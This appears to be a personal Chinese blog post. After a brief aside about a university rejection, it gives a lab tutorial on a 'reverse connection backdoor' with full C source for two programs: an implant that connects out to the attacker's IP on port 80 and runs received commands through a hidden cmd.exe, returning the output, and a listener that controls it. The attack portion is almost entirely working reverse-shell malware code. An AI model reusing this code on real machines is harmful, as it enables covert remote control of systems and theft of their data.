大过年的,一早收到第一封rejection from CS U-Washington Seattle,郁闷。估计明天起还有一批rej要来,何时有offer啊!淡定淡定,要让自己变强大!恩恩!学习去!
反向后门连接,就是把后门程序植入到服务器上,由服务器主动发起对hacker的连接,由此hacker可以突破网络的访问障碍与server通信,并通过后门获取服务器信息。
实验环境:server:windows 7 professional edition + vc6.0
hacker:windows server 2003 sp2 + vc6.0
server端的后门程序:
#include <winsock2.h> #include <stdio.h> #pragma comment(lib,"ws2_32.lib") int main() { WSADATA WSAData; SOCKET sock; sockaddr_in addr_in; char buf1[1024];//作为socket接受数据的缓冲区 memset(buf1,0,1024);//清空缓冲区 //初始化socket if(WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error./n"); return 0; } addr_in.sin_family = AF_INET; addr_in.sin_port = htons(80);//远端端口 addr_in.sin_addr.S_un.S_addr = inet_addr("192.168.111.133");//远端IP if( (sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == INVALID_SOCKET) { printf("Socket failed. Error:%d /n",WSAGetLastError()); return 0; } //绑定源地址与套接字 if(WSAConnect(sock, (struct sockaddr*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL) == SOCKET_ERROR) { printf("Connect failed. Error: %d/n",WSAGetLastError()); return 0; } printf("begin to create pipe/n"); char buffer[2048] = {0};//管道输出的数据 for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))) { //绑定cmdshell SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出 HANDLE hRead,hWrite;//输入和输出管道 sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = true; if(!CreatePipe(&hRead,&hWrite,&sa,0))//创建输入输出管道并与安全标识符相连 { printf("Error on CreatePipe()/n"); return 0; } printf("create pipe success/n"); STARTUPINFO si;//被写入hWrite管道 PROCESS_INFORMATION pi; HANDLE hProcess; HANDLE hThread; DWORD dwProcessID; DWORD dwThreadID; si.cb = sizeof(STARTUPINFO); GetStartupInfo(&si); si.hStdError = hWrite; si.hStdOutput = hWrite; si.wShowWindow = SW_HIDE; si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; GetSystemDirectory(cmdline, MAX_PATH + 1);//cmdline里为系统目录 strcat(cmdline,"//cmd.exe /c "); printf("cmdline = %s/n",cmdline); int len = recv(sock,buf1,1024,NULL);//接受客户端命令,保存在buf1中。程序进入阻塞状态直到接收到客户端的数据才运行下一条命令 if(len == SOCKET_ERROR)//如果客户端断开连接,则退出程序 exit(0); if(len <= 1) { send(sock,"error/n",sizeof("error/n"),0); continue; } strncat(cmdline,buf1,strlen(buf1));//得到完整的命令 printf("message get: %s/n",cmdline); if(!CreateProcess(NULL,cmdline,NULL,NULL,true,NULL,NULL,NULL,&si,π)) { send(sock,"Error command/n",sizeof("Error command/n"),0); continue; } CloseHandle(hWrite); //循环读出管道中数据并发送,直到管道中没有数据为止 for(DWORD byteRead;ReadFile(hRead,buffer,2048,&byteRead,NULL);memset(buffer,0,2048)) send(sock,buffer,strlen(buffer),0); } return 1; }
hacker端的操纵程序:
#include <winsock2.h> #include <stdio.h> #include <iostream> #pragma comment(lib,"ws2_32.lib") using namespace std; int main() { WSADATA WSAData; //初始化socket if(WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error./n"); return 0; } SOCKET client;//主动连接,相当于server client = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(client == INVALID_SOCKET) { printf("Error at socket():%ld /n",WSAGetLastError()); WSACleanup(); return 0; } //获取本地网络地址 char hostName[128]; gethostname(hostName,100); hostent *g_pHost; g_pHost=gethostbyname(hostName); ULONG HostIP = *(ULONG*)g_pHost->h_addr_list[0]; printf("本机ip为: (%d) /n",HostIP); //绑定socket sockaddr_in backdoor; backdoor.sin_family = AF_INET; //backdoor.sin_addr.s_addr = inet_addr("127.0.0.1"); backdoor.sin_addr = *(in_addr *)g_pHost->h_addr_list[0]; backdoor.sin_port = htons(80); if(bind(client,(SOCKADDR *)&backdoor,sizeof(SOCKADDR)) == SOCKET_ERROR) { printf("bind error: %ld/n",WSAGetLastError()); closesocket(client); return 0; } //监听socket if( listen(client,1) == SOCKET_ERROR) printf("error listening socket/n"); //接受socket连接 SOCKET acceptSocket; sockaddr_in server; printf("waiting for a client to connetc.../n"); while(1) { acceptSocket = SOCKET_ERROR; while(acceptSocket == SOCKET_ERROR) acceptSocket = accept(client,(SOCKADDR *)&server,NULL); printf("server connected/n"); client = acceptSocket;//client已经取得后门server的地址以及端口 break; } printf("recv from: %s/n",inet_ntoa(server.sin_addr)); //发送接受数据 int byteSent; int byteRecv = SOCKET_ERROR; char sendbuf[32] = "ipconfig"; char recvbuf[2048] = ""; //发送数据 byteSent = send(client,sendbuf,strlen(sendbuf),0); printf("Byte Send/n"); //接收数据 byteRecv = recv(client,recvbuf,2048,0); printf("Byte Recv: %d /n",byteRecv); printf("message received: %s/n",recvbuf); cout<<recvbuf; return 1; }
验证过程:hacker端注意关闭iis,使80端口不要被占用。启动该后门控制程序。
之后server启动后门程序,在hacker端就可以得到server端ipconfig的信息了。
